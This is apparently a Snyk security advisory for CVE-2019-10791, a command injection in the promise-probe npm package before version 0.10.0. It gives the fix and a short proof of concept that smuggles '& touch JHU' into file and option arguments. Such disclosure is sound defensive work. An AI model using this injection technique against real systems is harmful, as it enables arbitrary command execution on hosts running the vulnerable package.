Command Injection Affecting promise-probe package, versions <0.10.0
Snyk CVSS: Attack Complexity Low; Confidentiality High
Threat Intelligence: Exploit Maturity Proof of concept; EPSS 0.48% (76th percentile)
- Snyk ID SNYK-JS-PROMISEPROBE-546816
- published 6 Feb 2020
- disclosed 4 Feb 2020
- credit JHU System Security Lab
Introduced: 4 Feb 2020
CVE-2019-10791
How to fix?
Upgrade promise-probe to version 0.10.0 or higher.
Overview
promise-probe is an FFprobe wrapper.
Affected versions of this package are vulnerable to Command Injection via the ffprobe(file) and createMuteOgg(outputFile, options) functions. The file, outputFile and options parameters can be controlled by users without any sanitization.
PoC by JHU System Security Lab
var root = require("promise-probe");
root.ffprobe("& touch JHU");
root.createMuteOgg("123",{seconds:"& touch JHU &"});
root.createMuteOgg("& touch JHU",{});